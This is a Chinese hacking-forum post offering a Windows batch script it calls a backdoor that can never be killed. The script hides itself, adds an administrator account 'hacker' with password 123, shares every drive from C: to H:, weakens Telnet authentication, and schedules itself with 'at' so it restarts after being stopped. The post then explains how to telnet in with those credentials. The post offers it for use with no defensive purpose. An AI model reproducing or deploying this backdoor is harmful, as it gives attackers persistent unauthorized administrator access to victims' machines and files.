- 帖子
- 107
- 积分
- 292
- 威望
- 472
- 金钱
- 267
- 在线时间
- 1 小时
|
永不被杀的后门批处理
先新件个文本文档,在里面输入如下内容:
@echo off
@attrib +s + r hacker.bat
@net user hacker 123/add
@net localgroup administrators hacker /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 19:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\hacker.bat
@echo at 20:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\hacker.bat
@at 19:05 c:\WINNT\SYSTEM32\hacker.bat
@at 20:05 c:\WINNT\SYSTEM32\hacker.bat
@net stop telnet
@net start telnet
@exit
然后保存为hacker.bat的文件 这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为hacker,密码为123oct' ange
http://hi.baidu.com/octts
[url=http://wpa.qq.com/msgrd?V=1&Uin=13004251&Site=Yes黑客联盟论坛&Menu=yes |
|